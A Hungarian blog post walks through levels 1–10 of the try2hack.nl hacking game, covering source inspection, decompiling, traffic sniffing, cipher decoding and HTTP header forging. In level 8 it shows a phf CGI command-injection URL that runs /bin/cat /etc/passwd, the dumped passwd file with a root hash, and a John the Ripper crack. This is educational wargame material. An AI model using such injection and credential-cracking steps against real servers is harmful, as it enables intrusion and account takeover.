try2hack.nl: végigjátszás
2007 Január 24, Szerda 02:01 
RoliSoft 
Egy hozzászólás 
Kikapcsolódás
Ahogy az előző postomban is mondtam, amint játszok és befejezek egy levelt csinálok egy howto-t. Először is felvilágosítlak hogy ez csak egy játék, és azzal hogy befejeztél belőle 1-2,5-6,10-11 pályát nem azt jelenti hogy "hacker" vagy... (max advanced script-bunny 
)
Az alábbihoz még annyit toldok hogy én Operát használok internetezésre, tehát találsz 1-2 Opera szpecifikus funkciót is benne. Ahol mást, ott jelzem a nevét. A levelek mellett az URLk a 2007 január-február URL-it tükrözi, ezek nem fognak menni egy idő múlva! Ja, és mikor ezeket oldom kb 10 google / sec hogy exploitot vagy decompilert keressek... ezt csak azért mondom, mert ezt nem tudni kell hanem meg kell tanulni keresni!
Level 1 - http://try2hack.nl/levels/
Ez nagyon könnyű. Tekintsd meg a forrást, és egy Javascriptbe ütközöl még az elején!
<script language="JavaScript">
<!--
function Try(passwd) {
if (passwd =="h4x0r") {
alert("Alright! On to level 2...");
location.href = "level2-xfdgnh.xhtml";
}
else {
alert("The password is incorrect. Please don't try again.");
location.href = "http://www.disney.com/";
}
}
//-->
</script>
A logical-if-ben ott van hogy a passwd (lásd passwd nevű input a formok között) hogy a h4x0r.
Level 2 - http://try2hack.nl/levels/level2-xfdgnh.xhtml
Ez már egy kicsit nehezebb kezdőknek, úgyanis ez egy beágyazott flashben programozott és fordított bejelentkeztetővel állunk szembe.
Nézd meg a forrást*, és töltsed le a beágyazott obiektumot. (level2.swf) (* IE és Netscape esetén tiltott a jobbklikk... Használj egy normális böngészőt! 
)
Most 2 megoldás létezik: (1) megnyitod HEX-el vagy Notepad-el és mindenre rászöksz ami olvasható, vagy (2) használsz egy flash visszefejtőt és visszafejted az egész forrást majd abba keresel jelszó függvény után.
Én az elsőt válaszottam, nincs nagy kedvem most éjjel flash decompiler után keresgélni.
A vége fele a fájlnak van valami ilyesmi hogy:
txtUsername O-
try2hack I-
txtPassword O-
irtehh4x0r! IOOOO O fO level3-.xhtml
Ebből meg lehet tudni egy pár dolgot...
Level 3 - http://try2hack.nl/levels/level3-.xhtml
Ehh, belépéskor kéri a jelszavat, ha pedig Cancel akkor meg back to disneyland. Ilyenkor disable javascript és back gomb. Megnézzük a forrást.
<script language="JavaScript">
<!--
pwd = prompt("Please enter the password for level 3:","");
if (pwd==PASSWORD){
alert("Allright!nEntering Level 4 ...");
location.href = CORRECTSITE;
}
else {
alert("WRONG!nBack to disneyland !!!");
location.href = WRONGSITE;
}
PASSWORD="AbCdE";
CORRECTSITE="level4-sfvfxc.xhtml";
WRONGSITE="http://www.disney.com";
//-->
</script>
Persze, alapból mindenki nekiszökik mint ahogy azt az elsőben csináltuk. Nos rossz hírem van, JavaScriptben a változókat először megadjuk majd dolgozunk velük, azaz a felső kód sehogysem müködik... Ámde! Úgye hogy elmentél a legelső kód mellett:
<script src="JavaScript"></script> Ajaj, így nem lesz belőled senki, annyit kéne tudni (de köszönet a szemnek, hamar átugrod azt a részt) hogy a script-nek magadjuk hogy az Javascript de mint TYPE vagy LANGUAGE és NEM mint SRC, ugyanis azzal behívunk valamit. Nos, akkor vadászatra fel, úgyanis kellene létezni, és van is egy olyan fájl a szerveren hogy JavaScript... (try2hack.nl/levels/JavaScript) Let's open it!
PASSWORD = "try2hackrawks";
CORRECTSITE = "level4-kdnvxs.xhtml";
WRONGSITE = "http://www.disney.com";
Hoppá, mit látnak szemeim...! 404 helyett egy kis javascript fájl egy pár változóval...
Level 4 - http://try2hack.nl/levels/level4-kdnvxs.xhtml
Ajaj, megint egy beágyazott obiektum, ez már egy jáva program...
Újra két lehetőség: byte-halászat vagy visszafejtés. Megint megprobálok halászni (könnyebb módszer mint 100 megás 10 perces illegális trial visszafejtőt letölteni, viszont az is következik ha az első nem hoz eredményt) valamit. Letöltöm és megnyitom a PasswdLevel4.class java appletet Notepad-ben. Egy kis kijátszás van itt, ugyanis NINCS benne a fájlba a jelszó. Netről tölti le, mégpedig (csak úgy kiváncsiságból probálgattam és a) /levels/level4 fájlból.
level5-fdvbdf.xhtml
appletking
pieceofcake
Goto level 5.
Level 5 - http://try2hack.nl/levels/level5-fdvbdf.xhtml
Egy kezdők számára "lehetetlen" feladat. Nem semmi más mint egy kis VB-s progi ami nincs tömörítve... Tehát letöltés és megnyitás Notepadbe. 
Itt nem müködik ez a megoldás hiszen a http://www.try2hack.nl/levels/level6-ksghvb.xhtml az nem a level 6. Fogj meg egy Visual Basic decompilert és úszítsd rá, majd szükséges lesz egy Visual Basic 6-ra is amivel fordítsd vissza a programot...
Ha visszafordítottad a szoftvert nem mást kapsz mint a következő forrásokat:
' LEVEL5.MAK
' ----------
LEVEL5.FRM
main.txt
Module1.BAS
Title="LEVEL5"
ExeName="level5.exe"
' Module1.BAS
' -----------
' Module1
Option Explicit
Const c000A = " txtUsername=AlmostAHacker "
Const c000E = " txtPassword=ZqrE01A2d "
' MAIN.TXT
' --------
' main.txt - global definitions
Global Const gc0006 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEF"
"GHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}</>"
Global Const gc000A = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"
' LEVEL5.BAS
' ----------
' LEVEL5.FRM
' ----------
Option Explicit
Sub cmdLogin_Click ()
If edtUsername = Mid(gc0006, 56, 1) & Mid(gc0006, 28, 1) &
Mid(gc0006, 35, 1) & Mid(gc0006, 3, 1) &
Mid(gc0006, 44, 1) & Mid(gc0006, 11, 1) &
Mid(gc0006, 13, 1) & Mid(gc0006, 21, 1) Then
If edtPassword = Mid(gc0006, 45, 1) & Mid(gc0006, 48, 1) &
Mid(gc0006, 25, 1) & Mid(gc0006, 32, 1) &
Mid(gc0006, 15, 1) & Mid(gc0006, 40, 1) &
Mid(gc0006, 25, 1) & Mid(gc0006, 14, 1) &
Mid(gc0006, 19, 1) Then
MsgBox "Level 6 can be found at: " & Left$(gc000A, 37) & Mid(gc0006, 21, 1) &
Mid(gc0006, 14, 1) & Mid(gc0006, 29, 1) &
Mid(gc0006, 32, 1) & Mid(gc0006, 12, 1) &
Mid(gc0006, 14, 1) & Mid(gc000A, 44, 6),
0, "Horray!"
End
End If
End If
MsgBox "Invalid username and/or password!", 0, "ERROR!"
End Sub
Sub Form_Load ()
Me.Move (Screen.Width - Me.Width) / 2, (Screen.Height - Me.Height) / 2
End Sub
Az 1. modulban van egy user/pass kombináció de ez NEM helyes ha tovább nézd! A gc0006 és gv000A változókból szálassza ki, te nincs mit csinálj, mint letölts egy Visual Basic compilert, és a következő kódot fordítsd le:
Global Const gc0006 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEF"
"GHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}</>"
Global Const gc000A = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"
Sub Form_Load ()
MsgBox Mid(gc0006, 45, 1) & Mid(gc0006, 48, 1) &
Mid(gc0006, 25, 1) & Mid(gc0006, 32, 1) &
Mid(gc0006, 15, 1) & Mid(gc0006, 40, 1) &
Mid(gc0006, 25, 1) & Mid(gc0006, 14, 1) &
Mid(gc0006, 19, 1)
MsgBox Mid(gc0006, 56, 1) & Mid(gc0006, 28, 1) &
Mid(gc0006, 35, 1) & Mid(gc0006, 3, 1) &
Mid(gc0006, 44, 1) & Mid(gc0006, 11, 1) &
Mid(gc0006, 13, 1) & Mid(gc0006, 21, 1)
End Sub
Első felbukó ablak a user, és a második a pass, amik nem mások mint Try2Hack és ILoveDodi .
Level 6 - http://www.try2hack.nl/levels/level6-kdsvbd.xhtml
Egy újabb program. Ez már Visual Basic 6 alatt... De, mi is történt miközben a teszt júzer/jelszót írtam be? Kiabált a tűzfalam! Kapcsolat a külvilággal? Igen, nos akkor fogj meg egy packer sniffert, én a NirSoft féle SmartSniff freeware/portable szoftvert használom ilyen célra. Indítsd el a figyelést és nyomj még egy bejelentkezést a szoftverbe, majd szúrd ki hogy mit küld a try2hack.nl-nek!
47 45 54 20 2F 6C 65 76 65 6C 73 2F 6C 65 76 65 GET /levels/leve
6C 36 2E 64 61 74 61 20 48 54 54 50 2F 31 2E 31 l6.data HTTP/1.1
0D 0A 48 6F 73 74 3A 20 77 77 77 2E 74 72 79 32 ..Host: www.try2
68 61 63 6B 2E 6E 6C 0D 0A 43 6F 6E 6E 65 63 74 hack.nl..Connect
69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 55 73 65 72 ion: close..User
2D 41 67 65 6E 74 3A 20 54 72 79 32 48 61 63 6B -Agent: Try2Hack
20 6C 65 76 65 6C 20 36 20 63 6C 69 65 6E 74 0D level 6 client.
0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A .Accept: */*....
Tehát level6.data. Nade, amit ott teccik kapni az nem fincsi.
(ENCRYPTION TYPE)
B*C*N**N
(USERNAME)
aaabb aaaaa aaaab abbab ababb aaaab
(PASSWORD)
aabaa abbaa aaaba baaaa babba abbba baaba abaaa abbab abbaa baaaa aaaaa babaa abaab baaab
(PAGE)
babab aabab abaab abbab aabbb aaaba
Ezzel mit kezdünk? Először is megnézzük hogy mi az a B*C*N**N. Erre kiválló eszköz a Google, akinek még nem barátja! Amit találtam az nemmás, minthogy ez a kódolás Baconian metódus, amit Francis Bacon filozófus fejlesztett ki. Ez megfejtve valahogy így néz ki:
A = aaaaa E = aabaa I/J= abaaa N = abbaa R = baaaa W = babaa
B = aaaab F = aabab K = abaab O = abbab S = baaab X = babab
C = aaaba G = aabba L = ababa P = abbba T = baaba Y = babba
D = aaabb H = aabbb M = ababb Q = abbbb U/V= baabb Z = babbb
Nos akkor Ceasar-féle metódus, keressük ki a megfelelőjét! Username: DABOMB míg Password: ENCRYPTIONRAWKS . Írjuk be a szoftverbe és lépjünk tovább!
Level 7 - http://www.try2hack.nl/levels/level7-xfkohc.php
Heh, lehetetlen? Nem, csak a HTTP-t kell ismerni! A feltételek a következőek: (sorban jönnek)
1.: Browser check: Sorry, but you must use Microsoft Internet Explorer 7.66
2.: OS check: Must be using Unix or Linux
3.: You must come from www.microsoft.com/ms.htm
Fogjunk meg egy Telnet klienst. Töltsük le, a Hostname-hez pirka be www.try2hack.nl és port 80 és protocol Telnet. Katt a Connectre. Írni be a következőt majd nyomni ki Enter szemét:
GET http://www.try2hack.nl/levels/level7-xfkohc.php HTTP/1.0
User-Agent: MSIE 7.66/LINUX
Referer: http://www.microsoft.com/ms.htm
Ezeket a csodákat úgy tudtam meg hogy az RFC 1945 dokumentumból elolvastam a 10.15 és 10.13 fejezeteket. Ha ezzel megvagyunk lépjünk tovább.
Level 8 - http://www.try2hack.nl/levels/level8-balnrg.xhtml
Egy bejelentkeztető. De méghozzá CGI powered. Akkor google cgi-bin phf exploit vagy vulnerability, mert mást nincs mit csinálni hiszen ez szerver felőli cuccos. Nézzük meg már az első találatot, http://insecure.org/sploits/phf-cgi.html . Tehát akkor nyissuk meg az etc/passwd fájlt, mit szólnál hozzá? Ehhez mindössze ide kell ellépni: http://www.try2hack.nl/cgi-bin/phf?Qalias=/bin/cat%20/etc/passwd és lőn világosság (vagy sötétség?)
root:khXGN7s.ldaJI:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0
ystem Operator:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0ecure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25::0:0endmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26::0:0endmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6::0:0: Post Office Owner:/nonexistent:/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
Fáj a fogam a rootra. A passwd fájl feltöréséről a John The Ripper van elhíresülve... Töltsük le és nézzük meg mit is tud ez! http://www.openwall.com/john/ Windows alatt nem müködött jól a szoftver, így képtelen voltam egy Knoppixot letölteni! Onnantól pedig:
Letöltöttem a Windowsos verziót és a passwd fájlt mellé tettem majd a README-nek megfelelően a következő beszélgetésem volt a parancssorral!
$> john -i 5.txt
Loaded 1 password (Standard DES [24/32 4K])
arse (root)
guesses: 1 time: 0:00:01:09 c/s: 168418 trying: SabCoch - arse
$>
Tehát akkor a root jelszava arse. És müködik is.
Hello root, welcome to your account.
Level up!
Level 9 - http://try2hack.nl/levels/level9-gnapei.php
Egy kis PHPs bejelentkeztető rendszer amiről semmit sem tudni. Ámde, hosszas keresgélés után megláttam hogy küldött pár sütit a böngészőnek:
str_username=admin; str_password=yu0aertehbomb; auth=no
Mi lenne, ha ezeket szépen szépen beütnénk a formba, és persze az auth-ot yes-re változtassuk...
Level 10 - irc.mediamonks.net/try2hack.level10 (kulcs: yu0aertehbomb)
Ez egy irc-es channel... Amibe ha belépünk a következő fogad:
11:27 Started talking with LEVEL10-27 on Saturday 27/01/2007 11:27:13 AM
LEVEL10-27: [#try2hack.level10] Welcome, I am try2hack Level10! Decode the following line to proceed:
LEVEL10-27: 0100111001101001011000110110010100100000011010100110111101100010001011100010000001001110011011110111011100100000011101
0001111001011100000110010100100000001001110010111101101101011100110110011100100000010101000101001001011001001100100100
1000010000010100001101001011001000000111001101101000011011110111011101100010011101010110011100100111001000000111010001
101111001000000111001101100101011001010010000001110100011010000110010100100000011000100111010101100111
Bináris, semmi más.
Nice job. Now type '/msg TRY2HACK showbug' to see the bug
Válasz a showbug-ra:
TRY2HACK: ovaq pgpe - CVAT pgpe:cvatercyl
TRY2HACK: cebp pgpe:cvatercyl {avpx hubfg unaq qrfg xrl net} {
TRY2HACK: frg qhe [rkce [havkgvzr] - $net]
TRY2HACK: chgfrei \"ABGVPR $avpx :Lbhe cvat ercyl gbbx $qhe frpbaqf\"}
Ez így nem érthető, de szerencsére nemrég foglalkoztam ROT13 kódolással így rájöttem hogy ez nemmás mint ROT13 encoded string. Fordítsuk vissza:
bind ctcr - PING ctcr:pingreply
proc ctcr:pingreply {nick uhost hand dest key arg} {
set dur [expr [unixtime] - $arg]
putserv \"NOTICE $nick :Your ping reply took $dur seconds\"}
Ez egy scriptnek néz ki, habár én nem vagyok irc szakértő... Nem tudni mit kezdeni ezzel, úgyhogy majd még utánna érdeklődök hogy hogy lehet egy ilyesmit futtatni...
Mára ennyi. To be continued...
Hozzászólások
ALex
1 hozzászólás 
Statisztika
Ez a bejegyzés 101 hete, 6 napja, 21 órája és 13 perce született a kikapcsolódás kategóriában, és pontosan a 49. itt a sandboxon.
Tartalmaz pontosan 13267 betűt szóközök nélkül, és 2424 szót.
Ebben a kategóriában még volt 92 hete, 1 napja, 4 órája és 39 perce egy olyan bejegyzésem hogy Programming cheat sheet - puska programozóknak!, aztán 102 hete, 0 napja, 0 órája és 19 perce megfordult a fejemben az is hogy try2hack.nl
![[Valid RSS]](img/valid-rss.png "Validate my RSS feed")
![[Valid Atom 1.0]](img/valid-atom.png "Validate my Atom 1.0 feed")
